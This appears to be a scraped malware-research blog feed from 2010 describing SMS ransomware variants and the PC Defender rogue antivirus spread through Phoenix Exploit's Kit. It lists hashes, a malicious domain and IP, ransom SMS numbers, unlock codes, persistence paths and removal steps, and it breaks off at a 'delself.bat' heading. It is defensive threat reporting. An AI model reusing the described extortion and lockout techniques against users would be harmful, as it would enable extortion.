According to the text, to get a key to unlocking it's necessary to send a message such as SMS to <b>4161</b> with the message<b> 2AV112239</b>. This set of alphanumeric characters isn’t the only one who can show, as it has a list that is displayed at random. The list consists of the following springs:</div><br />
<div style="text-align: center;"><i>2AV166522, 2AV288764, 2AV222419, 2AV288888, 2AV266555, 2AV119999, 2AV121436, 2AV178477, 2AV166522, 2AV111199, 2AV187211, 2AV133211, 2AV111223, 2AV243562, 2AV211246, 2AV244533, 2AV277631, 2AV233884, 2AV242665, 2AV233211, 2AV288599, 2AV299884, 2AV286442, 2AV248864, 2AV222464, 2AV288434, 2AV265543, 2AV211278, 2AV299977, 2AV165431, 2AV131313, 2AV132218, 2AV155543, 2AV166666, 2AV186443, 2AV155422, 2AV198775, 2AV144366, 2AV199797, 2AV197797, 2AV177979, 2AV166321, 2AV111229, 2AV155322, 2AV187532, 2AV112239, 2AV164554, 2AV134274, 2AV153221, 2AV311111, 2AV311112, 2AV311113, 2AV311114, 2AV311115, 2AV311116, 2AV311117, 2AV311118, 2AV311119, 2AV311120, 2AV311121, 2AV311123, 2AV311124, 2AV311125, 2AV311126, 2AV311127, 2AV311128, 2AV311129, 2AV311130, 2AV311131, 2AV311132, 2AV311133, 2AV311134, 2AV311135, 2AV311136, 2AV311137, 2AV311138, 2AV311139, 2AV311140, 2AV311141, 2AV311142, 2AV311143, 2AV311144, 2AV311145, 2AV311146, 2AV311147, 2AV311148, 2AV311149, 2AV311150, 2AV311151, 2AV311152, 2AV311153, 2AV311154, 2AV311155, 2AV311156, 2AV311157, 2AV311158, 2AV311159, 2AV311160, 2AV311161, 2AV311162, 2AV311163, 2AV311164, 2AV311165, 2AV311166, 2AV311167, 2AV311168, 2AV311169, 2AV311170, 2AV311171, 2AV311172, 2AV311173, 2AV311174, 2AV311175, 2AV311176, 2AV311177, 2AV311178, 2AV311179</i></div><br />
The malware disables the possibility to access the system in Safe Mode and access the following programs:<br />
<ul><li>TASKMGR.EXE</li>
<li>REGEDT32.EXE</li>
<li>MSCONFIG.EXE</li>
<li>EXPLORER.EXE</li>
<li>TEXPL.EXE</li>
<li>ANVIR.EXE </li>
</ul><span style="font-size: large;"><b>Countermeasure</b></span><br />
Unlock using the following key:<br />
<ul><li><b>Environ</b></li>
</ul>Click the first button and press the <b>Enter</b> key.<br />
Restart the system.<br />
Delete the registry key from ctfmon.exe.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/_Mcy4oUq8gAQ/TGiOJ4sXKHI/AAAAAAAAATk/4vB1U23aJwk/s1600/MI_regedit.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="67" src="http://1.bp.blogspot.com/_Mcy4oUq8gAQ/TGiOJ4sXKHI/AAAAAAAAATk/4vB1U23aJwk/s400/MI_regedit.png" width="400" /></a></div><br />
Run an updated antivirus.<br />
<br />
<b>Related information</b><br />
<div style="color: orange;"><a href="http://malwaredisasters.blogspot.com/2010/04/copyright-violation-copyrighted-content.html"><br />
</a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://twitter.com/jorgemieres" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="100" src="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TEJjsQv18QI/AAAAAAAAAQc/00l0WDs0VO0/s200/follow_tw.png" width="100" /></a></div><a href="http://malwaredisasters.blogspot.com/2010/07/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites IV</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/06/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites III</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/05/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites II</a> <br />
<a href="http://malwaredisasters.blogspot.com/2010/04/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/03/another-very-active-sms-ransomware.html" style="color: orange;">Another very active SMS Ransomware</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/03/sms-ransomware-for-windows-in-wild.html" style="color: orange;">SMS Ransomware for Windows In-the-Wild</a><div class="blogger-post-footer">https://twitter.com/MalwareInt</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1670645896303580754.post-58431587693351649312010-08-11T20:18:00.000+01:002010-08-11T20:18:14.065+01:00PC Defender Antivirus rogue update system registry<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/TGL04JSl3FI/AAAAAAAAASk/in6ZuUmiP_w/s1600/MI_pcdav-act.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div><div style="text-align: justify;">The criminals who are behind the development of <b>PC Defender Antivirus</b> rogue in the last few hours have updated the registration system for the false application.<br />
<br />
The record in the first version was to send a text message SMS rate telephone number located in Russia, while this new version requests a serial number (supposedly under the hardware-locked system) generated using as part of a activation key.</div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/TGL04JSl3FI/AAAAAAAAASk/in6ZuUmiP_w/s1600/MI_pcdav-act.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="302" src="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/TGL04JSl3FI/AAAAAAAAASk/in6ZuUmiP_w/s400/MI_pcdav-act.png" width="400" /></a></div>It also adds a button (Buy) that redirects to a form hosted on <i>Plimus</i>, and updated the malware into English. The first version was only in Russian.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TGL1EHyyJ5I/AAAAAAAAASs/I0rJMymWGOw/s1600/MI_en.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="217" src="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TGL1EHyyJ5I/AAAAAAAAASs/I0rJMymWGOw/s400/MI_en.png" width="400" /></a></div><div style="text-align: justify;">This action makes it quite evident that behind the spread of these threats, lies across an organization intended to develop malware to accommodate an underground economy that feeds, increasingly, fraudulent methods.</div><div class="blogger-post-footer">https://twitter.com/MalwareInt</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1670645896303580754.post-21690495171546624982010-08-11T19:07:00.000+01:002010-08-11T19:32:50.625+01:00Phoenix Exploit's Kit and Pay-per-Install via PC Defender Antivirus<div style="text-align: justify;"><b>Pay-per-Install</b> is one of the business models by which an <b>affiliate system</b> provides a set of "clients" one or more malicious code, paying each a percentage of money as a commission for each installation the malicious application successful.<br />
<br />
<b>Phoenix Exploit's Kit</b> is a crimeware by which intelligence is done collecting statistical information related to each of the infected computers. You enter through an access panel via the http protocol as we see in the screenshot.</div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/_Mcy4oUq8gAQ/TGLirliq6VI/AAAAAAAAARs/JxpwPrkBnPA/s1600/MI_login.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="238" src="http://1.bp.blogspot.com/_Mcy4oUq8gAQ/TGLirliq6VI/AAAAAAAAARs/JxpwPrkBnPA/s400/MI_login.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/_Mcy4oUq8gAQ/TGLi5CccdlI/AAAAAAAAAR0/906aUzYdpzI/s1600/MI_pcdav.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div><div style="text-align: justify;"><b>PC Defender Antivirus</b> is a rogue Russian origin whose spread is being made through Phoenix Exploit's Kit, reporting at the same time to an affiliate system that records the installation of each downloaded copy.<br />
<br />
In addition to collaborating with the criminal circuit feeding back the fraudulent business through Pay-per-Install, the rogue has the grain of usual business whereby it’s intended that the fraudulent application is purchased, also via the web, this action involving form information stored somewhere confidential credit card. The cost of the rogue is <b>USD 59.95</b>.</div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/_Mcy4oUq8gAQ/TGLi5CccdlI/AAAAAAAAAR0/906aUzYdpzI/s1600/MI_pcdav.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="303" src="http://1.bp.blogspot.com/_Mcy4oUq8gAQ/TGLi5CccdlI/AAAAAAAAAR0/906aUzYdpzI/s400/MI_pcdav.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TGLjDc4xLGI/AAAAAAAAAR8/bq6nI5a-bh8/s1600/MI-pcap.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div><div style="text-align: justify;">Through Phoenix Exploit's Kit spreads a trojan downloader called <b>exe.exe</b>, in this case MD5 e49be7ef82250a36cf7410004ac3d69c that, after it establishes a connection to fordkaksosat.info (<b>193.105.207.45</b> - <b>AS50793</b> "<b>ALFAHOSTNET</b>") from which it downloads and executes the rogue (<b>PCDefenderSilentSetup.msi </b>- ecff63c1f983858dfd7fb926738cb478).<br />
<br />
In this instance, the rogue is reported to the affiliate system to load the information on successful installation through <b>count_installs.php</b> file, and begins a malware scan issuing alerts about alleged attempts to connect infections and also false. This activity is usual in this type of malware to be one of their employers.</div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TGLjDc4xLGI/AAAAAAAAAR8/bq6nI5a-bh8/s1600/MI-pcap.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="100" src="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TGLjDc4xLGI/AAAAAAAAAR8/bq6nI5a-bh8/s400/MI-pcap.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/TGLjLYVkSoI/AAAAAAAAASE/wg9mK1-xatc/s1600/MI_PCDAV-infection.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="213" src="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/TGLjLYVkSoI/AAAAAAAAASE/wg9mK1-xatc/s400/MI_PCDAV-infection.png" width="400" /></a></div><br />
<div style="text-align: justify;">The release system for the alleged security application is similar to that used by some families of ransomware through the business model that involves sending a text message SMS to a specific type of phone number.<br />
<br />
In this case, the information should be sent to the number <b>5711000002209</b> with the message <b>6681</b>.</div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TGLjYaA16mI/AAAAAAAAASM/ZzJ1IzxV2Go/s1600/MI_PCDAV-SMS.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="301" src="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TGLjYaA16mI/AAAAAAAAASM/ZzJ1IzxV2Go/s400/MI_PCDAV-SMS.png" width="400" /></a></div><br />
<div style="text-align: justify;">The threat has a timer which generates a false statement <b>Blue Screen of Death</b> (<b>BSoD)</b>, in which shows the incentive to record the program, exerting a fear (psychological warfare) on the user that after reading this information might think register/buy what you think, this is a real antivirus solution.</div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/_Mcy4oUq8gAQ/TGLjmqNGjZI/AAAAAAAAASU/VUg8yQxHJdY/s1600/MI_BSoD.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="187" src="http://1.bp.blogspot.com/_Mcy4oUq8gAQ/TGLjmqNGjZI/AAAAAAAAASU/VUg8yQxHJdY/s400/MI_BSoD.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TGLju6mT3GI/AAAAAAAAASc/-RIwOO3fLfs/s1600/MI_pcdav-files.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div><br />
<span style="font-size: large;"><b>Countermeasures</b></span><br />
Terminate the processes called <b>prockill32.exe</b>, <b>proccheck.exe</b> and <b>rundelay.exe</b>. You can use the <a href="http://technet.microsoft.com/en-us/sysinternals/bb896653.aspx" style="color: orange;">ProcessExplorer</a> to view and terminate processes.<br />
<br />
Remove PC Defender folder (which houses six files) located in <span style="font-family: "Courier New",Courier,monospace;">C:\Program Files\Def Group\</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TGLju6mT3GI/AAAAAAAAASc/-RIwOO3fLfs/s1600/MI_pcdav-files.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TGLju6mT3GI/AAAAAAAAASc/-RIwOO3fLfs/s320/MI_pcdav-files.png" /></a></div>Delete the system registry PC Defender key from <span style="font-family: "Courier New",Courier,monospace;">HKLM\SOFTWARE\Microsoft\Windows\ CurrentVersion\Run</span>, which refers to <span style="font-family: "Courier New",Courier,monospace;">c:\program files\def group\PC Defender\pcdef.exe</span>. You can use the <a href="http://technet.microsoft.com/en-us/sysinternals/bb963902.aspx" style="color: orange;">Autoruns</a> to view and delete the key.<br />
<br />
<b>Related Information</b><br />
<div style="color: orange;"><a href="http://malwaredisasters.blogspot.com/2010/04/copyright-violation-copyrighted-content.html"><br />
</a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://twitter.com/jorgemieres" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="100" src="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TEJjsQv18QI/AAAAAAAAAQc/00l0WDs0VO0/s200/follow_tw.png" width="100" /></a></div><div style="color: orange;"><a href="http://malwaredisasters.blogspot.com/2010/04/copyright-violation-copyrighted-content.html">Copyright violation: copyrighted content detected</a></div><div style="color: orange;"><a href="http://malwareint.blogspot.com/2010/08/campaign-infection-through-phoenix.html" style="color: orange;">Campaign infection through Phoenix Exploit's Pack</a> </div><a href="http://malwaredisasters.blogspot.com/2010/07/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites IV</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/06/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites III</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/05/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites II</a> <br />
<a href="http://malwaredisasters.blogspot.com/2010/04/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/03/dangerous-trojans-keyloggers-and.html" style="color: orange;">Dangerous trojans, keyloggers and Spyware detected in you computer!!!</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/03/another-very-active-sms-ransomware.html" style="color: orange;">Another very active SMS Ransomware</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/03/sms-ransomware-for-windows-in-wild.html" style="color: orange;">SMS Ransomware for Windows In-the-Wild</a><br />
<a href="http://malwaredisasters.blogspot.com/2009/12/desktop-hijack-by-internet-security.html" style="color: orange;">Desktop Hijack by Internet Security 2010. Your System Is Infected!</a><br />
<a href="http://malwaredisasters.blogspot.com/2009/12/lockscreen-your-computer-is-infected-by.html" style="color: orange;">LockScreen. Your computer is infected by Spyware!!!</a><div class="blogger-post-footer">https://twitter.com/MalwareInt</div>Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-1670645896303580754.post-33226043382354505142010-07-23T03:58:00.000+01:002010-07-23T04:09:14.827+01:00SMS Ransomware porn template update<div style="text-align: justify;">A new <a href="http://malwaredisasters.blogspot.com/2010/07/new-variant-of-ransomware-through-porn.html" style="color: orange;">variant of ransomware type blocker that promotes pornographic sites</a> is In-the-Wild, with the inner slightly modified. Basically you have changed the number to which the victim must send messages like SMS. Now the number is <b>86571252</b> and the message remains the same: <b>6005</b>.<br />
<br />
Another change is in the location which holds the copy of the threat. In this case, the path is <span style="font-family: "Courier New",Courier,monospace;">C:\Documents and Settings\Default User\Media\</span> under the name <b>run32.exe</b>. The first image shows the previous version, while the second corresponds to the new variant of the <b>SMS Ransomware</b>.</div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TEkDAiS9iuI/AAAAAAAAAQk/mATI_j_6RCM/s1600/MI_ransom-full.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="187" src="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TEkDAiS9iuI/AAAAAAAAAQk/mATI_j_6RCM/s400/MI_ransom-full.png" width="400" /></a><a href="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TEkDNXBazcI/AAAAAAAAAQs/Sdk_vDbxQ94/s1600/MI_ransom-upd1..png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="187" src="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TEkDNXBazcI/AAAAAAAAAQs/Sdk_vDbxQ94/s400/MI_ransom-upd1..png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TEkDWEFfSYI/AAAAAAAAAQ0/Io5QQv-Idto/s1600/MI_ransom-update2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div><div style="text-align: justify;">The ransomware is distributed, as in previous cases, through porn sites. This variant uses the same name as cover (flash_player.exe), its MD5 is <b>2e8f56ce39270e10f7082a35d13a735a</b> and as I write this update has a detection rate average, <a href="http://www.virustotal.com/analisis/fe504e0f8f6ae024159cfb7a9b7622db3d3919c297fe62939fbb9eda8f699b79-1279837077" style="color: orange;">12/42 being detected by antivirus engines</a>.</div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TEkDWEFfSYI/AAAAAAAAAQ0/Io5QQv-Idto/s1600/MI_ransom-update2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="105" src="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TEkDWEFfSYI/AAAAAAAAAQ0/Io5QQv-Idto/s400/MI_ransom-update2.png" width="400" /></a></div><br />
<span style="font-size: large;"><b>Countermeasures</b></span><br />
Identify and terminate the process called "<b>run32.exe</b>." At this time ransomware window disappears.<br />
** The name of the process can also be <b>process32.exe</b>.<br />
<br />
*** To kill the process you can use Task Manager or the native Windows application <a href="http://technet.microsoft.com/en-us/sysinternals/bb896653.aspx" style="color: orange;">ProcessExplorer</a>.<br />
<br />
Delete the following system information<br />
Registry:<br />
<span style="font-family: "Courier New",Courier,monospace;">HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Module</span><br />
Value:<br />
AModule<br />
<span style="font-family: "Courier New",Courier,monospace;">"C:\Documents and Settings\Administrador\Media\run32.exe"</span><br />
*** You can also use <a href="http://technet.microsoft.com/en-us/sysinternals/bb963902.aspx" style="color: orange;">Autoruns</a> application to view the record in an orderly manner.<br />
<br />
Folders:<br />
<span style="font-family: "Courier New",Courier,monospace;">C:\Documents and Settings\Default User\Media</span><br />
<br />
Files:<br />
<span style="font-family: "Courier New",Courier,monospace;">C:\Documents and Settings\All Users\Media\run32.exe</span><br />
<span style="font-family: "Courier New",Courier,monospace;">C:\Documents and Settings\All Users\Media\rdb.bat</span><br />
<br />
<b>Related information</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://twitter.com/jorgemieres" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="100" src="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TEJjsQv18QI/AAAAAAAAAQc/00l0WDs0VO0/s200/follow_tw.png" width="100" /></a></div><a href="http://malwaredisasters.blogspot.com/2010/07/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites IV</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/06/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites III</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/05/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites II</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/04/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/03/another-very-active-sms-ransomware.html" style="color: orange;">Another very active SMS Ransomware</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/03/sms-ransomware-for-windows-in-wild.html" style="color: orange;">SMS Ransomware for Windows In-the-Wild</a><div class="blogger-post-footer">https://twitter.com/MalwareInt</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1670645896303580754.post-90658725163942037712010-07-18T03:11:00.000+01:002010-08-22T04:56:27.271+01:00New variant of ransomware through porn sites IV<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/_Mcy4oUq8gAQ/TEJhHDCAR9I/AAAAAAAAAQE/dX9wqKfvr7Y/s1600/MI_new-ransom-block.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div><div style="text-align: justify;">Another variant of the family <b>ransomware</b> of type blocker is In-the-Wild, using as cover for attacks to be the Flash Player installer via an executable file called <a href="http://www.virustotal.com/analisis/4485e49d5d47e18cde6cb44e77c288aabb174d02855388c40f225bf21c26dea4-1279260582" style="color: orange;"><b>flash_player.exe</b></a> and whose MD5 is <b>acf591ac5ad2a26bf348708dda174b33</b>.<br />
<br />
This time is also related to a porn site that opens immediately after infecting the system. However, unlike past versions, the window does not display an image block with conditional connotation. </div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/_Mcy4oUq8gAQ/TEJhHDCAR9I/AAAAAAAAAQE/dX9wqKfvr7Y/s1600/MI_new-ransom-block.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="287" src="http://1.bp.blogspot.com/_Mcy4oUq8gAQ/TEJhHDCAR9I/AAAAAAAAAQE/dX9wqKfvr7Y/s400/MI_new-ransom-block.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/TEJhN1TO9OI/AAAAAAAAAQM/7Kea9mVFCx4/s1600/MI_new-ransom-block-2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div><div style="text-align: justify;">As we see in the image, just simply presents the user requirements towards obtaining the necessary password to allow, in theory, to unlock the appearance of the annoying window, but does not occupy the whole desktop (also very common case in ransomware), the window stays malicious in the lower right of this, superimposed on any other window.</div><br />
In this case the user should send a short text message <b>SMS</b> to <b>86577491</b> with message <b>6005</b>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/TEJhN1TO9OI/AAAAAAAAAQM/7Kea9mVFCx4/s1600/MI_new-ransom-block-2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="287" src="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/TEJhN1TO9OI/AAAAAAAAAQM/7Kea9mVFCx4/s400/MI_new-ransom-block-2.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/_Mcy4oUq8gAQ/TEJhVd-qTlI/AAAAAAAAAQU/qNshN60r8hY/s1600/MI_ransom-full.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div><div style="text-align: justify;">When the binary is executed through a simple sentence written in BAT, tells the malicious application that copies itself to <span style="font-family: "Courier New",Courier,monospace;">C:\Documents and Settings\All Users\Media</span> under the name <b>kasper_zaebal.exe</b>, add a reference in Run registry key and adds information security area.</div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/_Mcy4oUq8gAQ/TEJhVd-qTlI/AAAAAAAAAQU/qNshN60r8hY/s1600/MI_ransom-full.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="187" src="http://4.bp.blogspot.com/_Mcy4oUq8gAQ/TEJhVd-qTlI/AAAAAAAAAQU/qNshN60r8hY/s400/MI_ransom-full.png" width="400" /></a></div><div style="text-align: justify;">Parallel open a browser session by redirecting traffic to the porn site that resolves <b>www.redtube.eu</b> IP address <b>216.155.139.158</b> (<b>AS20473 - CHOOPA</b>), classified as malware server and C&C of some botnets.</div><br />
<span style="font-size: large;"><b>Countermeasures</b></span><br />
Enter the following code: <b>29543874</b><br />
<br />
If you want to try a more "traditional" follow the steps below: <br />
<br />
Identify and terminate the process called "kasper_zaebal.exe." At this time ransomware window disappears.<br />
<br />
To kill the process you can use Task Manager or the native Windows application <a href="http://technet.microsoft.com/en-us/sysinternals/bb896653.aspx" style="color: orange;">ProcessExplorer</a>.<br />
<br />
Delete the following system information<br />
<br />
Registry: <br />
<span style="font-family: "Courier New",Courier,monospace;">HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Module</span><br />
Value: <br />
<span style="font-family: "Courier New",Courier,monospace;">AModule</span><br />
<span style="font-family: "Courier New",Courier,monospace;">“%ALLUSERSPROFILE%\Media\kasper_zaebal.exe”</span><br />
<br />
You can also use <a href="http://technet.microsoft.com/en-us/sysinternals/bb963902.aspx" style="color: orange;">Autoruns</a> application to view the record in an orderly manner.<br />
<br />
Folders:<br />
<span style="font-family: "Courier New",Courier,monospace;">C:\Documents and Settings\All Users\Media</span><br />
<br />
Files:<br />
<span style="font-family: "Courier New",Courier,monospace;">C:\Documents and Settings\All Users\Media\kasper_zaebal.exe</span><br />
<span style="font-family: "Courier New",Courier,monospace;">C:\Documents and Settings\All Users\Media\rdb.ba</span><br />
<br />
<b>Related information</b><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://twitter.com/jorgemieres" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="100" src="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TEJjsQv18QI/AAAAAAAAAQc/00l0WDs0VO0/s200/follow_tw.png" width="100" /></a></div><a href="http://malwaredisasters.blogspot.com/2010/06/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites III</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/05/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites II</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/04/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/03/another-very-active-sms-ransomware.html" style="color: orange;">Another very active SMS Ransomware</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/03/sms-ransomware-for-windows-in-wild.html" style="color: orange;">SMS Ransomware for Windows In-the-Wild</a><div class="blogger-post-footer">https://twitter.com/MalwareInt</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1670645896303580754.post-9513338938673349402010-06-20T18:54:00.000+01:002010-06-20T18:57:02.244+01:00New variant of ransomware through porn sites III<div style="text-align: justify;">Another variant is ransomawre In-the-Wild. Like previous variants, it spreads through porn sites. The case presented <b>axporno.ru</b> page uses a vector of propagation.<br />
<br />
When infecting the computer displays a window that overlaps any other, and by showing the information needed to theoretically unlock the system.</div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/TB5STiWDVnI/AAAAAAAAALc/y824MuWCLPU/s1600/ransom.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/TB5STiWDVnI/AAAAAAAAALc/y824MuWCLPU/s320/ransom.png" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/_Mcy4oUq8gAQ/TB5SY24JPmI/AAAAAAAAALk/sj70lezzCwQ/s1600/ransom2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div><div style="text-align: justify;">When you try to close the image is displayed in a new window that provides information on how to eliminate it. The maneuver, as is usual in the latest generation of ransomware type blocker, is to encourage the user to send a text message SMS rate to a certain number (<b>162772132</b>) and certain information (<b>3381</b>).</div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/_Mcy4oUq8gAQ/TB5SY24JPmI/AAAAAAAAALk/sj70lezzCwQ/s1600/ransom2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/_Mcy4oUq8gAQ/TB5SY24JPmI/AAAAAAAAALk/sj70lezzCwQ/s320/ransom2.png" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/TB5SnGOFs3I/AAAAAAAAALs/_hhPOfFztGs/s1600/smscost.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div><div style="text-align: justify;">Create files <b>sc.ini</b> and <b>delself.bat</b>, both housed in the System32 folder. The first stores information equivalent to the number of infection and route where the malware binary, while the second saves the information to remove some tracks.</div><br />
<b>sc.ini</b><br />
<span style="font-size: x-small;"><span style="font-family: "Courier New",Courier,monospace;">600</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">C:\Documents and Settings\All Users\Media\module.exe</span></span><br />
<br />
<b>delself.bat</b><br />
